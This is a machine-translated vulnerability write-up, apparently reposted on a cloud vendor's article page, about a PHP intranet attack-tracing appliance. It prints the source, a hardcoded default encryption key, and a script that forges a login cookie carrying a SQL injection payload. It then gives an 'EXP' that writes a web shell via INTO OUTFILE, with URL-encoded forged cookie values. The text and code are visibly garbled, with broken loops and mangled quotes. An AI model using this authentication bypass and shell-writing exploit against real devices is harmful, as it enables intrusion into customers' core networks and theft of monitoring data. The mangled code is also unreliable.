Vulnerability Analysis of an attack Tracing System (affecting customers' core network segments and sensitive monitoring information)

Source: Internet
Author: User
Tags set cookie

Vulnerability Analysis of an attack Tracing System (affecting customers' core network segments and sensitive monitoring information)

The device is deployed on the Intranet. the device is directly connected to the host device monitored on the Intranet or the trunk route. The device needs to connect to the Internet and the cloud is connected.
It's been a long time to let it go. You need to synchronize the rules with the cloud and issue some rules, as well as the Big Data Association and other analysis on some IP addresses.

Read com_function.php
Code Region
/**
*
* Global user logon information
*/
Function global_user_info (){
Global $ db, $ _ COOKIE;
 
If (! Isset ($ _ COOKIE ['user _ key']) return array ();
 
# Parsing user logon KEY
$ User_key = str_authcode ($ _ COOKIE ['user _ key'], 'decode ');
If (! $ User_key) return array ();
$ Key_arr = json_decode ($ user_key, true );
 
# Detect Logon
$ Cu_name = $ key_arr ['cu _ name'];
$ Cu_type = intval ($ key_arr ['cu _ type']);
$ Cu_key = $ key_arr ['cu _ key'];
$ Login = $ db-> query_one ("SELECT * FROM center_user_login WHERE cu_name = '$ cu_name' AND cu_key = '$ cu_key '");
If (! $ Login) return array ();
 
# Return logon information
$ Ret = array (
'Cu _ name' => $ cu_name,
'Cu _ type' => $ cu_type,
'Cu _ key' => $ cu_key
);
Return $ ret;
}
/**
* Global user logout
*/
Function global_login_out (){
Global $ db, $ USER_INFO;
 
If (! $ USER_INFO) exit ('OK ');
 
# Clearing database logon information
$ Cu_name = $ USER_INFO ['cu _ name'];
$ Cu_key = $ USER_INFO ['cu _ key'];
$ Db-> query ("delete from center_user_login WHERE cu_name = '$ cu_name' AND cu_key = '$ cu_key '");
 
# Clear logon information
Setcookie ('user _ key ','');
 
# Return
Exit ('OK ');
}
/**
* User Login and permission judgment
*/
Function global_user_permiss ($ type = 0 ){
Global $ USER_INFO;
 
# Obtain parameters
$ Cu_name = $ USER_INFO ['cu _ name']? $ USER_INFO ['cu _ name']: '';
$ Cu_type = $ USER_INFO ['cu _ type']? Intval ($ USER_INFO ['cu _ type']): 0;
 
# Determine whether to log on
If (! $ Cu_name ){
Header ("Location: login. php ");
Exit;
}
 
# User Logon determine User Permissions
If ($ type & $ cu_type
Header ("Location: index. php ");
Exit;
}
Return;
}
/**
* Logon password encryption
* @ Param username $ uname
* @ Param password $ upwd
*/
Function user_pwd_encry ($ uname, $ upwd ){
 
# Judgment
If (! $ Uname |! $ Upwd) return false;
 
# Password encryption
$ Pwd = md5 (md5 ($ uname). md5 ($ upwd ));
Return $ pwd;
}
/**
* String decryption encryption.
* @ Param $ string-string to be encrypted or decrypted.
* @ Param $ operation-= 'encoding' indicates encryption; = 'decode' indicates decryption.
* @ Param $ key-the encryption key. If not, use the global variable CT_KEY.
* @ Param $ expiry -? Expiration time
* @ Return returns the encrypted or decrypted result string.
*/
Function str_authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
$ Ckey_length = 4; // the random key length ranges from 0 to 32;
// Adding a random key can make the ciphertext irregular. Even if the original text and the key are identical, the encryption results will be different each time, increasing the difficulty of cracking.
// The larger the value, the larger the ciphertext change law. The ciphertext change is equal to the power of $ ckey_length of 16.
// When this value is 0, no random key is generated
$ Key = md5 ($ key? $ Key: CT_KEY); // If $ key is not given, use the global variable CT_KEY.
$ Keya = md5 (substr ($ key, 0, 16); // The first half of the key is md5 again, $ keya = 32-byte long string
$ Keyb = md5 (substr ($ key, 16, 16); // the second half of the key is md5 again, $ keya = 32-byte long string
// $ Keyc takes the first 4 characters of $ string for 'decode'. For 'encoding', The microtime () is a random last 4 characters, which should be more random.
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
 
$ Cryptkey = $ keya. md5 ($ keya. $ keyc); // a 64-byte long string.
$ Key_length = strlen ($ cryptkey );
// Encryption
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
// The encryption/decryption process is shown below. The specific encryption algorithm is not familiar yet.
$ Rndkey = array ();
For ($ I = 0; $ I
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
For ($ j = $ I = 0; $ I
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
Important
Code Region
# Parsing user logon KEY
$ User_key = str_authcode ($ _ COOKIE ['user _ key'], 'decode ');
If (! $ User_key) return array ();
$ Key_arr = json_decode ($ user_key, true );
 
# Detect Logon
$ Cu_name = $ key_arr ['cu _ name'];
$ Cu_type = intval ($ key_arr ['cu _ type']);
$ Cu_key = $ key_arr ['cu _ key'];
$ Login = $ db-> query_one ("SELECT * FROM center_user_login WHERE cu_name = '$ cu_name' AND cu_key = '$ cu_key '");
If (! $ Login) return array ();
 
# Return logon information
$ Ret = array (
'Cu _ name' => $ cu_name,
'Cu _ type' => $ cu_type,
'Cu _ key' => $ cu_key
);
Return $ ret;
}
Trace: str_authcode Function
Code Region
Function str_authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
$ Ckey_length = 4; // the random key length ranges from 0 to 32;
// Adding a random key can make the ciphertext irregular. Even if the original text and the key are identical, the encryption results will be different each time, increasing the difficulty of cracking.
// The larger the value, the larger the ciphertext change law. The ciphertext change is equal to the power of $ ckey_length of 16.
// When this value is 0, no random key is generated
$ Key = md5 ($ key? $ Key: CT_KEY); // If $ key is not given, use the global variable CT_KEY.
$ Keya = md5 (substr ($ key, 0, 16); // The first half of the key is md5 again, $ keya = 32-byte long string
$ Keyb = md5 (substr ($ key, 16, 16); // the second half of the key is md5 again, $ keya = 32-byte long string
// $ Keyc takes the first 4 characters of $ string for 'decode'. For 'encoding', The microtime () is a random last 4 characters, which should be more random.
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
 
$ Cryptkey = $ keya. md5 ($ keya. $ keyc); // a 64-byte long string.
$ Key_length = strlen ($ cryptkey );
// Encryption
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
// The encryption/decryption process is shown below. The specific encryption algorithm is not familiar yet.
$ Rndkey = array ();
For ($ I = 0; $ I
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
For ($ j = $ I = 0; $ I
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
For ($ a = $ j = $ I = 0; $ I
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
Use discuz encryption. Then the value of so ...... key is the default value: define ('ct _ key', '503d2a62fbe03250c61da3655a717748 '); the rest is easy to understand.
Code Region
$ Key_arr = json_decode ($ user_key, true );
Code Region
$ Ret = array (
'Cu _ name' => $ cu_name,
'Cu _ type' => $ cu_type,
'Cu _ key' => $ cu_key
);
Json. Add the password and then click OK. Important sentence: $ login = $ db-> query_one ("SELECT * FROM center_user_login WHERE cu_name = '$ cu_name' AND cu_key = '$ cu_key'"); that is to say here. The injection points cu_name and cu_key are all available. Encrypt the data. --
Code Region
/**
* $ String plaintext or ciphertext
* $ Operation encrypts the ENCODE or decrypts the DECODE
* $ Key
* $ Expiry key validity period
*/
Function authcode ($ string, $ operation = 'decode', $ key = '', $ expiry = 0 ){
// The length of the dynamic key. Different ciphertext values are generated for the same plaintext based on the dynamic key.
// Adding a random key can make the ciphertext irregular. Even if the original text and the key are identical, the encryption results will be different each time, increasing the difficulty of cracking.
// The larger the value, the larger the ciphertext change law. The ciphertext change is equal to the power of $ ckey_length of 16.
// When this value is 0, no random key is generated
$ Ckey_length = 4;
 
// Key
// $ GLOBALS ['discuz _ auth_key '] can be modified as needed.
$ Key = md5 ($ key? $ Key: $ GLOBALS ['discuz _ auth_key ']);
 
// Key a is used for encryption and decryption.
$ Keya = md5 (substr ($ key, 0, 16 ));
// Key B is used for data integrity verification.
$ Keyb = md5 (substr ($ key, 16, 16 ));
// Key c is used to change the generated ciphertext
$ Keyc = $ ckey_length? ($ Operation = 'decode '? Substr ($ string, 0, $ ckey_length): substr (md5 (microtime (),-$ ckey_length )):'';
// Key used for calculation
$ Cryptkey = $ keya. md5 ($ keya. $ keyc );
$ Key_length = strlen ($ cryptkey );
// Plaintext. The first 10 digits are used to save the timestamp. Data Validity is verified during decryption, and 10 to 26 digits are used to save $ keyb (Key B). Data integrity is verified through this key during decryption.
// If it is decoded, it starts from the $ ckey_length bit, because the $ ckey_length bit before the ciphertext stores the dynamic key to ensure correct decryption.
$ String = $ operation = 'decode '? Base64_decode (substr ($ string, $ ckey_length): sprintf ('% 010d', $ expiry? $ Expiry + time (): 0). substr (md5 ($ string. $ keyb), 0, 16). $ string;
$ String_length = strlen ($ string );
$ Result = '';
$ Box = range (1, 0,255 );
$ Rndkey = array ();
// Generate a key book
For ($ I = 0; $ I
$ Rndkey [$ I] = ord ($ cryptkey [$ I % $ key_length]);
}
// Use a fixed algorithm to disrupt the key book and increase randomness. It seems complicated. In fact, it does not increase the ciphertext strength.
For ($ j = $ I = 0; $ I
$ J = ($ j + $ box [$ I] + $ rndkey [$ I]) % 256;
$ Tmp = $ box [$ I];
$ Box [$ I] = $ box [$ j];
$ Box [$ j] = $ tmp;
}
// Core encryption/Decryption part
For ($ a = $ j = $ I = 0; $ I
$ A = ($ a + 1) % 256;
$ J = ($ j + $ box [$ a]) % 256;
$ Tmp = $ box [$ a];
$ Box [$ a] = $ box [$ j];
$ Box [$ j] = $ tmp;
// The keys obtained from the key book are different or converted into characters.
$ Result. = chr (ord ($ string [$ I]) ^ ($ box [($ box [$ a] + $ box [$ j]) % 256]);
}
If ($ operation = 'decode '){
// Substr ($ result, 0, 10) = 0 verify Data Validity
// Substr ($ result, 0, 10)-time ()> 0 to verify data Validity
// Substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26). $ keyb), 0, 16) verify data integrity
// Verify the data validity. See the unencrypted plaintext format.
If (substr ($ result, 0, 10) = 0 | substr ($ result, 0, 10)-time ()> 0) & substr ($ result, 10, 16) = substr (md5 (substr ($ result, 26 ). $ keyb), 0, 16 )){
Return substr ($ result, 26 );
} Else {
Return '';
}
} Else {
// Save the dynamic key in the ciphertext, Which is why different ciphertext can be decrypted in the same plain text.
// Because the encrypted ciphertext may be special characters, the copying process may be lost, so it is base64-encoded.
Return $ keyc. str_replace ('=', '', base64_encode ($ result ));
}
}
 
$ Array = array (
'Cu _ name' => "hacker' OR 1 LIMIT 1 #",
'Cu _ type' => 9,
& Apos; cu _ key' = & apos; 123 & apos ",
);
$ C = json_encode ($ array );
Echo authcode ($ c, "ENCODE", "503d2a62fbe03250c61da3655a717748 ");
?>
The encrypted result is as follows:

This is because COOKIES are directly substituted. You only need to modify COOKIES. Set cookie. The value of user_key is
Code Region
8586OUNS98IqbV6GGqHeoMjOjEAdaXc/2 IpKP +/samples/fsla6vaRpjeyIr7Dp9NSUsjt6FtEmJzJwr0
Because there is a plus sign (+) that requires url encoding.
Code Region
% 38% 35% 38% 36% 4F % 55% 4E % 53% 39% 38% 49% 71% 62% 56% 36% 47% 47% 71% 48% 65% 45% 6F % 4D % 6A % 4F % 6A 41% 64% 61% 58% 63% 2F % 32% 49% 70% 4B % 50% 2B % 2F % 36% 4F % 31% 6E % 79% 71% 43% 38% 45% 62% 54% 76% 70% 71% 74% 43% 72% 6A % 41% 7A % 75% 4E % 37% 71% 70% 42% 70% 45% 65% 37% 65% 38% 76% 35% 74% 6D % 65% 48% 45% 33% 51% 31% 2F % 66% 6C % 73% 61% 36% 76% 61% 6A % 52% 70% 65% 79% 49% 72% 37% 44% 70% 39% 4E % 53% 55% 6A % 73% 74% 36% 46% 74% 6D % 4A % 7A % 45% 77% 30

Because the KEY value is the same. Therefore, the COOKIES generated above can be logged on to any iron eye device. The mysql permission should be root, so you can try to write shell. I will give EXP:
Code Region
{"Cu_name": "bigjj", "cu_type": 9, "cu_key": "jjfly 'Union SELECT 111, average, 333 into outfile'/tmp/showtime. php '#"}
The website directory is/var/www/html/Write shell encryption:
Code Region
% 34% 38% 65% 61% 4c % 47% 55% 56% 63% 50% 66% 36% 4e % 4f % 43% 63% 59% 67% 64% 6f % 64% 6c % 4d % 5a % 75% 57% 45% 6b % 79% 43% 6b % 66% 32% 2b % 57% 6a % 78% 4c % 59% 45% 39% 78% 63% 73% 47% 59% 69% 6f % 4b % 59% 5a % 48% 61% 61% 77% 4d % 71% 74% 47% 30% 71% 30% 35% 68% 78% 4f % 50% 6f % 30% 42% 46% 31% 68% 43% 32% 4c % 61% 70% 42% 71% 7a % 44% 43% 79% 36% 4b % 67% 78% 32% 6e % 33% 4f % 39% 61% 34% 79% 77% 2b % 31% 31% 72% 64% 37% 6c % 45% 50% 66% 53% 44% 32% 74% 78% 2f % 76% 62% 58% 67% 37% 72% 42% 31% 4c % 46% 56% 72% 72% 44% 59% 43% 76% 70% 55% 30% 50% 53% 74% 4a % 32% 73% 32% 79% 62% 69% 76% 46% 4a % 50% 69% 79% 74% 78% 52% 79% 69% 55% 38% 38% 6a % 54% 71% 42% 71% 34% 35% 47% 4c % 46% 76% 53% 4c % 70% 79% 79% 30% 66% 57% 6e % 45% 71% 57% 68% 4b % 7a % 6f % 5a % 64% 6d % 2f % 46% 62% 4d % 37% 78% 63% 50% 61% 52% 2f % 71% 75% 6d % 41% 36% 42% 42% 45% 34% 4a % 33% 66% 34% 7a % 57% 2b % 4f % 53% 68% 69% 54% 55% 38% 54% 6c % 6a % 4f % 75% 4c % 33% 73% 6a % 6d % 63% 54% 42% 47% 49% 4e % 69% 55% 75% 68% 73% 44% 57% 66% 6e % 6b % 4f % 46% 74% 67% 54% 2f % 37% 50% 48% 70% 6d % 51% 6d % 6c % 58% 47% 77

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.